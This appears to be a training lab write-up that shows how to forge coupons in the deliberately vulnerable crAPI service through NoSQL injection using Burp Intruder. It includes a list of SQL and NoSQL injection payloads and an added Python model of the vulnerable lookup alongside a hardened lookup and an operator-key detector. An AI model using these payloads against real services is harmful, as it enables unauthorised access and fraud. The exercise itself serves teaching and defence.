AP 106: NoSQL Injection (10 pts extra)

What You Need

Purpose

To forge coupons via NoSQL Injection.

Connecting to crAPI

Open Burp. Click the Proxy tab. Click the Intercept tab.

Click the "Intercept is on" button so it changes to "Intercept is off".

Click the "Open Browser" button.

In Burp's browser, go to

https://crAPI.samsclass.info

The crAPI login page opens, as shown below.

Logging In

In Burp's browser, log in to crAPI with any account. If you don't have account credentials handy, click SignUp and create a new account.

You see the "Vehicles Details" page, as shown below.

Viewing the Shop

At the top of the crAPI page, click Shop.

At the top right, click "Add Coupon".

In the "Enter Coupon Code" box, enter a few characters, as shown below, and click Validate.

In Burp, on the HTTP History tab, click this request:

POST /community/api/v2/coupon/validate-coupon

The request contains only one JSON parameter, at the bottom of the image shown below.

Right-click this request and click "Send to Intruder".

Testing Injections

Click the Intruder tab.

Click the "Clear §" button.

Highlight the coupon_code value, as shown below, and click the "Add §" button.

Your window should look like the image below.

Click the Payloads tab.

Copy this list of SQL and NoSQL payloads and paste it into the Payload Options box:

'
''
;%00
--
-- -
""
;
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
OR 1=1
$gt
{"$gt":""}
{"$gt":-1}
$ne
{"$ne":""}
{"$ne":-1}
$nin
{"$nin":1}
{"$nin":[1]}
|| '1'=='1
//
||'a'\\'a
'||'1'=='1';//
'/{}:
'"\;{}
'"\/$[].>
{"$where":  "sleep(1000)"}

Your window should look like the image below.

At the top right, click the "Start Attack" button. Click OK.

Burp opens a new window and performs the attack.

The replies all have Status 500, as shown below. Apparently the injections are failing.

Examine a request containing curly braces, as shown below. The curly braces are being URL-encoded! That is likely to block the injection.

Eliminating URL Encoding

Close the "Intruder attack" window.

On the Intruder tab, on the Payloads sub-tab, scroll to the bottom and clear the "URL-encode these characters..." box, as shown below.

Perform the attack again.

Now the server responds with some status 422 messages: "invalid character...", as shown below.

Removing Quotes

Close the "Intruder attack" window.

On the Intruder tab, on the Positions sub-tab, at the bottom, remove the quotes around the injection position, as shown below, so that each payload is sent as a bare JSON value rather than inside a string.

Perform the attack again.

Some of the injections succeed with Status 200, as shown below.
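The three Intruder runs differ only in what the server's JSON decoder hands to the database query: with the braces URL-encoded the value is an ordinary string that matches no coupon, with raw braces inside the quotes the body is no longer valid JSON (the "invalid character" responses), and with the quotes removed the value decodes to an object whose "$gt" or "$ne" key is interpreted as a MongoDB operator. The Python below is an added illustration, not crAPI's code or part of the lab: it models the coupon lookup with an in-memory stand-in for the collection, shows the vulnerable lookup beside a hardened one that accepts only a plain string, and includes an operator-key check of the kind a validation layer or detection rule can apply to request bodies. The coupon codes, amounts and request bodies are constructed.

```python
"""Why the lab's three Intruder runs behave differently, and the server-side
check that closes the hole. Added illustration, not crAPI's code: the coupon
collection, the lookup functions and the request bodies are constructed."""
import json
from urllib.parse import quote

# Constructed stand-in for the coupon collection (codes are made up).
COUPONS = [
    {"coupon_code": "SAMPLE10", "amount": "10"},
    {"coupon_code": "SAMPLE25", "amount": "25"},
]


def _matches(doc_value, condition):
    """Small subset of MongoDB match semantics: a literal value, or an
    operator object using $ne, $gt or $nin."""
    if not isinstance(condition, dict) or not condition:
        return doc_value == condition
    for op, arg in condition.items():
        if op == "$ne":
            ok = doc_value != arg
        elif op == "$gt":
            # Comparison operators only compare values of the same type, so
            # {"$gt": -1} never matches a string field, while {"$gt": ""}
            # matches every non-empty string.
            ok = type(doc_value) is type(arg) and doc_value > arg
        elif op == "$nin":
            if not isinstance(arg, list):
                raise ValueError("$nin needs an array")
            ok = doc_value not in arg
        else:
            raise ValueError(f"unsupported operator {op}")
        if not ok:
            return False
    return True


def find_one_unsafe(collection, coupon_code):
    """Vulnerable pattern: whatever the JSON decoder produced for coupon_code
    goes straight into the filter. A string is compared literally; an object
    becomes a query operator and can match coupons the caller never knew."""
    for doc in collection:
        if _matches(doc["coupon_code"], coupon_code):
            return doc
    return None


def has_operator_keys(value):
    """Validation/detection helper: True if any key anywhere inside the
    decoded value starts with '$' (the MongoDB operator prefix)."""
    if isinstance(value, dict):
        return any(k.startswith("$") or has_operator_keys(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return any(has_operator_keys(v) for v in value)
    return False


def find_one_safe(collection, coupon_code):
    """Hardened lookup: the value must be a plain string before it is used
    in a filter, so an operator object is rejected instead of executed."""
    if not isinstance(coupon_code, str):
        raise TypeError("coupon_code must be a string")
    return find_one_unsafe(collection, coupon_code)


def run_attempt(raw_body):
    """Model one Intruder request body. Returns 'invalid_json' (the lab's
    422 'invalid character' case), 'no_match', or the matched document,
    plus whether has_operator_keys() would have flagged the value."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError:
        return {"outcome": "invalid_json", "flagged": False}
    code = body.get("coupon_code")
    doc = find_one_unsafe(COUPONS, code)
    return {"outcome": doc if doc else "no_match",
            "flagged": has_operator_keys(code)}


# The same payload sent three ways, as in the lab (constructed bodies).
PAYLOAD = '{"$gt":""}'
ATTEMPTS = {
    # Run 1: Intruder URL-encodes the braces; the value stays a harmless string.
    "url_encoded_quoted": '{"coupon_code":"%s"}' % quote(PAYLOAD, safe=""),
    # Run 2: raw braces inside the quotes break the JSON.
    "raw_quoted": '{"coupon_code":"%s"}' % PAYLOAD,
    # Run 3: quotes removed; the value decodes to an operator object.
    "raw_unquoted": '{"coupon_code":%s}' % PAYLOAD,
}

if __name__ == "__main__":
    for name, body in ATTEMPTS.items():
        print(name, "->", run_attempt(body))
```

The fix is the type check in find_one_safe: a coupon code is a string, so anything else is rejected before it reaches the query builder. has_operator_keys() is the complementary check for a gateway or logging layer, where a "$"-prefixed key inside a request body is worth alerting on regardless of which field carries it.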

Flag AP 106.1: coupon_code (10 pts)

The flag is covered by a green rectangle in the image below.

Source

Hacking APIs

Posted 5-7-22